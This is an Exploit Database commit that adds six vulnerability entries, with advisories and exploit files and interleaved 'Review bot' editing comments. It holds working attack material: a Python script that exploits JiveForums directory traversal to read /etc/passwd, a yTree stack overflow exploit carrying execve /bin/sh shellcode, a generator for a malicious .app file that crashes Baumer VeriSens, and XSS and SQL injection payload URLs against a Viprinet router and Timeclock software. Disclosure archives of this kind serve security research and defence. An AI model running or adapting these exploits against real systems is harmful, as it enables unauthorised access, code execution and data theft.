DB: 2016-02-04

6 new exploits
Offensive Security 2016-02-04 05:01:40 +00:00
parent 970933a341
commit 1221dcb78e
7 changed files with 364 additions and 0 deletions

@ -35413,6 +35413,7 @@ id,file,description,date,author,platform,type,port
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - DoS",2016-01-03,Vishnu,windows,dos,0
39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0
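Review bot: the single row this hunk adds (the header counts go from 6 to 7 lines) is 39158, and its description "Advanced Encryption Package Buffer Overflow - DoS" carries no affected version, unlike the neighbouring rows, which name 5.24, 2.3.x and a 24-byte shellcode; the advisory this commit adds as platforms/windows/dos/39158.txt names no version either, so the row should be sharpened once the reporter supplies one.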
@ -35641,3 +35642,8 @@ id,file,description,date,author,platform,type,port
39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0
39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0
39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80
39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0
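Review bot: row 39404 misspells its description, "Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities"; it should read "Multiple SQL Injection Vulnerabilities" to match the file's own title "Timeclock-software - Multiple SQL injections". Row 39407 describes a web management interface issue but carries port 0 where the other webapps rows in this hunk (39402, 39404, 39405) carry 80. The remaining new rows (39403, 39405, 39406) agree with the titles and authors in their files.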

@ -0,0 +1,50 @@
Vulnerability title: Multiple Instances Of Cross-site Scripting In Viprinet Multichannel VPN Router 300
CVE: CVE-2014-2045
Vendor: Viprinet
Product: Multichannel VPN Router 300
Affected version: 2013070830/2013080900
Fixed version: 2014013131/2014020702
Reported by: Tim Brown
Details:
The data supplied to both the `old and `new web applications (the device has two web based management interfaces) was permanently stored and could be retrieved later by other users. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser.
Stored cross-site scripting could be triggered by:
Attempting to login with a username of `<script>alert(1)</script> (affects `old interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log)
Creating an account with a username of `<script>alert(1)</script> (affects both `old and `new interfaces once created)
Setting the devices hostname to `<script>alert(1)</script> (affects `old interface once created)
A number of locations were identified as being vulnerable to reflective attacks, including:
http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E
http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56
The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files.
These are simply some examples of how this attack might be performed, and the it is believed that both the `old and `new web applications are systemically vulnerable to this.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
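Review bot: the stray backticks in phrases such as "the `old and `new web applications" and "affects `old interface" are unbalanced quote characters lost in transcription and should be plain quotes, and two wording slips remain: "included in referred headers" should be "included in Referer headers", and "the it is believed" should be "it is believed". Content-wise the advisory gives affected and fixed builds but does not say whether the fixed release covers the three stored vectors as well as the reflected ones, which is what a reader deciding whether to upgrade needs to know.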

platforms/jsp/webapps/39405.py Executable file
@ -0,0 +1,61 @@
'''
JiveForums <=5.5.25 Directory Traversal Vulnerability
Description
==========
Jive forums is a widely recognized network community. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, Emc, Mcafee, Rapid7, Fireeye, etc.
The version of JiveForums <=5.5.25 and < 4.0 are vulnerable to a directory traversal security issue, other versions may also be affected.
Details
=======
Product: JiveSoftware
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: https://www.jivesoftware.com
Credits
============
Discovered by: Zhaohuan of Tencent Security
Site: http://security.tencent.com
Affected Products:
=================
Test on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
maybe work <= 5.5.25
Exploit:
============
'''
#!/usr/bin/python
# Author: Zhaohuan || http://weibo.com/hackyou
# Google Dork: inurl:servlet/JiveServlet
# Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
#
# Software Link: https://www.jivesoftware.com
import urllib2
import sys
print "JiveForums <=5.5.25 Directory Traversal Exploit"
if len(sys.argv) != 3:
print "[-] Trying exploit on : <site> <path>"
print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0]
sys.exit()
payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg'
print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload
response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload)
readvul=response.read()
print readvul
'''
Solution:
============
Update to jiveforums 5.5.30 or the latest version.
More Information:
https://www.jivesoftware.com/services-support/
'''
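Review bot: the shebang `#!/usr/bin/python` sits after a 23-line docstring, so it is not the first line of the file and the executable bit on platforms/jsp/webapps/39405.py will not select an interpreter; move the docstring below it. Two smaller points: `sys.exit()` on the usage path returns status 0 where a non-zero code would signal misuse, and the target URL is built by plain concatenation, `sys.argv[1]+sys.argv[2]+payload`, so the path argument must end in a slash exactly as the usage line shows or the request goes to the wrong location. The version statement "<=5.5.25 and < 4.0" is also redundant, since the second range lies inside the first; presumably a different bound was meant.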

platforms/linux/dos/39406.py Executable file
@ -0,0 +1,72 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com
# Program affected: yTree - File manager for terminals v1.94-1.1
# Description: yTree is prone to a stack-based overflow, an attacker could exploit
# this issue to execute arbitrary code in the context of the application.
# Failed exploit attempts will result in a denial-of-service condition.
#
# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org
#
# Program Description: This is a file manager that separates files from directories
# and allows you to select and manage files from different directories.
# It works on black and white or color terminals and is UTF-8 locales aware.
# Vendor homepage: http://www.han.de/~werner/ytree.html
# Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb
# MD5sum: 7d55d9c7e8afb4405c149463613f596b
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x41414141 EBX: 0xB7FB8000 ECX: 0x00000000 EDX: 0x08071342 o d I t s z a P c
# ESI: 0xBFFFF134 EDI: 0x41414141 EBP: 0x0806FC60 ESP: 0xBFFFDC50 EIP: 0xB7F888C1
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7f888c1 <werase+49>: mov eax,DWORD PTR [eax+0x4c]
# 0xb7f888c4 <werase+52>: mov DWORD PTR [esp+0x24],eax
# 0xb7f888c8 <werase+56>: mov eax,DWORD PTR [edi+0x50]
# 0xb7f888cb <werase+59>: mov DWORD PTR [esp+0x28],eax
# 0xb7f888cf <werase+63>: mov eax,DWORD PTR [edi+0x54]
# 0xb7f888d2 <werase+66>: mov DWORD PTR [esp+0x2c],eax
# 0xb7f888d6 <werase+70>: mov eax,DWORD PTR [edi+0x58]
# 0xb7f888d9 <werase+73>: mov DWORD PTR [esp+0x30],eax
# --------------------------------------------------------------------------------
# 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# gdb$ backtrace
# 0 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5
# 1 0x08050f43 in ?? ()
# 2 0x08051182 in ?? ()
# 3 0x0805972f in ?? ()
# 4 0x0804a68a in ?? ()
# 5 0xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287
# 6 0x0804a701 in ?? ()
import os,subprocess
def run():
try:
print "# yTree Buffer Overflow by Juan Sacco"
print "# It's fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*65
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*1200
eip = "\xd0\xf6\xff\xbf"
subprocess.call(["ytree",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, yTree not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit yTree v1.94-1.1 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
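Review bot: `howtousage()` calls `sys.exit(-1)` but the file only has `import os,subprocess`, so that path raises NameError; add `import sys`. The `try/except IndexError` in the `__main__` block wraps two print statements that cannot raise IndexError, so the handler is dead code, and `subprocess.call(["ytree",' ', junk + shellcode + nops + eip])` passes a literal single-space argument before the payload, which is unlikely to be intended. The header records the crash in werase() but lists no vendor notification or fixed version.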

platforms/php/webapps/39404.txt Executable file
@ -0,0 +1,37 @@
#############################
Exploit Title : Timeclock-software - Multiple SQL injections
Author:Marcela Benetrix
Date: 01/27/2016
version: 0.995 (older version may be vulnerable too)
software link:http://timeclock-software.net
#############################
Timeclock software
Timeclock-software.net's free software product will be a simple solution to
allow your employees to record their time in one central location for easy
access.
##########################
SQL Injection Location
1. http://server/login.php
username and password were vulnerable to time-based blind sql injection
type.
Moreover, once logged into the app; the following URLs were found to be
vulnerable too:
2. http://server/view_data.php?period_id
3. http://server/edit_type.php?type_id=
4. http://server/edit_user.php?user_id=
5. http://server/edit_entry.php?time_id=
All of them are vulnerable to Union query and time-based blind.
##########################
Vendor Notification
01/27/2016 to: the developers. They replied immediately and fixed the
problem in a new release
002/03/2016: Disclosure
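Review bot: the disclosure date "002/03/2016" in the Vendor Notification section has an extra leading zero and should read 02/03/2016, matching the 2016-02-03 date in files.csv. The notification entry says the developers "fixed the problem in a new release" without naming it, so the advisory should state the first fixed version alongside "version: 0.995". The second location is written as `view_data.php?period_id` without the `=` the other entries carry.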

platforms/windows/dos/39158.txt Executable file
@ -0,0 +1,48 @@
Dear List,
Greetings from vishnu (@dH4wk)
1. Vulnerable Product
- Advanced Encryption Package
- Company http://www.aeppro.com/
2. Vulnerability Information
(A) Buffer OverFlow
Impact: Attacker gains administrative access
Remotely Exploitable: No
Locally Exploitable: Yes
3. Vulnerability Description
A 1006 byte causes the overflow. It is due to the inefficient/improper
handling of exception. This is an SEH based stack overflow and is
exploitable..
4. Reproduction:
It can be reproduced by pasting 1006 "A"s or any characters in the
field where the key file is asked during encryption of "*TEXT TO ENCRYPT *"
tab..
*Windbg Output*
==============================================================
(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for
image00000000`00400000
image00000000_00400000+0x19c0:
004019c0 f00fc108 lock xadd dword ptr [eax],ecx
ds:002b:4141413d=????????
(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
41414141 ??
==============================================================
Regards,
Vishnu Raju.
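Review bot: the advisory never names the affected version of Advanced Encryption Package, and "Impact: Attacker gains administrative access" is not supported by what is shown: the WinDbg output demonstrates an access violation with attacker-supplied 0x41 bytes in the faulting address ("ds:002b:4141413d") and the final "41414141 ??", i.e. a crash, which is why the entry is filed under dos. Either state the version and the route to administrative access, or scale the impact line back to what the output shows. A report date and vendor contact are also missing.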

platforms/windows/dos/39403.py Executable file
@ -0,0 +1,90 @@
#!/usr/bin/env python
#
#
# Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability
#
#
# Vendor: Baumer Holding AG | Baumer Optronic GmbH
# Product web page: http://www.baumer.com
# Software link: http://www.baumer.com/us-en/products/identification-image-processing/software-and-starter-kits/verisens-application-suite/
# Affected version: 2.6.2 (ID-CS-XF-XC)
#
# Summary: The Baumer Application Suite is the intuitive configuration
# software for VeriSens vision sensors, which makes it quick and simple
# for even new users to implement image processing tasks. Starting with
# the creation of test tasks through to the management of jobs, the program
# will take you through just a few steps to reach your goal.
#
# Desc: The vulnerability is caused due to a boundary error in baselibs.dll
# library when processing device job file, which can be exploited to cause
# a buffer overflow when a user opens e.g. a specially crafted .APP file.
# Successful exploitation could allow execution of arbitrary code on the
# affected machine.
#
# -------------------------------------------------------------------------
# (78c.cb0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# Exported symbols for C:\Program Files (x86)\Baumer\VeriSens Application Suite v2.6.2\AppSuite\baselibs.dll -
# eax=4d81ab45 ebx=4d81ab45 ecx=41414141 edx=41414141 esi=4d81ab45 edi=0c17e010
# eip=56bc4186 esp=0040a020 ebp=0040a020 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
# baselibs!b_Int_restore+0x6:
# 56bc4186 8b00 mov eax,dword ptr [eax] ds:002b:4d81ab45=????????
# 0:000> u
# baselibs!b_Int_restore+0x6:
# 56bc4186 8b00 mov eax,dword ptr [eax]
# 56bc4188 8bc8 mov ecx,eax
# 56bc418a 8bd0 mov edx,eax
# 56bc418c c1ea18 shr edx,18h
# 56bc418f c1f908 sar ecx,8
# 56bc4192 81e100ff0000 and ecx,0FF00h
# 56bc4198 0bca or ecx,edx
# 56bc419a 8bd0 mov edx,eax
# 0:000> dds
# 56bc6b86 00107d80
# 56bc6b8a 8b117457
# 56bc6b8e f0e181cb
# 56bc6b92 e8000000
# 56bc6b96 fffff9e6
# 56bc6b9a 02ebf88b
# 56bc6b9e ff85fa8b
# 56bc6ba6 68000001
# 56bc6baa 56c2afa4 baselibs!VsInfoFeed::Listener::`vftable'+0xb154
# 56bc6bae 3f8ce857
# 56bc6bb2 c483ffff
# 56bc6bb6 75c0850c USER32!SetKeyboardState+0x705a
# 56bc6bba 325b5f07
# -------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5303
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5303.php
#
#
# 14.11.2015
#
header = ("\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00"
"\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00"
" \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01"
"\x00\x00\x00\x00\x50\x00\x00\x00") #\x0F
buffer = "\x41" * 6719 + "\x42\x42\x42\x42"
f = open ("exploit.app", "w")
f.write(header + buffer +'\x0F')
f.close()
print "File exploit.app created!\n"
#
# PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39403.zip
#
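Review bot: the third line of the `header` tuple, `" \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01"`, begins with a literal space before `\x00`, which inserts an extra 0x20 byte into the header and shifts everything after it by one; if this is not a transcription slip it should be verified against the bvas-5303.app.zip PoC linked at the end. The file is also opened with mode "w" rather than "wb"; the bytes written here contain no 0x0A, so text-mode newline translation on Windows happens not to corrupt them, but binary mode would make that explicit.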